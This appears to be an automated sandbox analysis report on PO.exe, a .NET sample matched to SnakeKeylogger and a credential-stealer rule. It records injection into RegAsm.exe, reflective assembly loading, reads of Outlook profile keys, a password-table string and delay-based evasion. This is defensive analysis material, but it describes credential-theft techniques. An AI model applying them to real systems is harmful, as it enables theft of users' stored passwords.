                Source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: PO.exe, Form1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, AirFilter.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, AirFilter.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO.exe.352e220.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO.exe.352e220.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorType
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.AreInjectorsClogged
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorDutyCycle
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorFlowRate
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorType
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.AreInjectorsClogged
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorDutyCycle
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, FuelInjector.csSuspicious method names: .FuelInjector.InjectorFlowRate
                Source: 0.2.PO.exe.34c3380.3.raw.unpack, EngineBlock.csSuspicious method names: .EngineBlock.FuelInjectionType
                Source: 0.2.PO.exe.34ed1b0.2.raw.unpack, EngineBlock.csSuspicious method names: .EngineBlock.FuelInjectionType
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000002.00000002.4146303325.0000000002950000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.0000000002940000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: PO.exe, 00000000.00000002.1683355480.0000000002491000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: PO.exe, Form1.cs.Net Code: Form1_Load System.Reflection.Assembly.Load(byte[])
                Source: PO.exe, Form1.cs.Net Code: Form1_Load
                Source: PO.exeStatic PE information: 0x827F415A [Thu May 19 00:31:22 2039 UTC]
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_06FB0C02 push es; ret 0_2_06FB0C10
                Source: PO.exeStatic PE information: section name: .text entropy: 7.755314263801649
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599342Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599182Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599076Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598755Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598620Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597950Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597172Jump to behavior
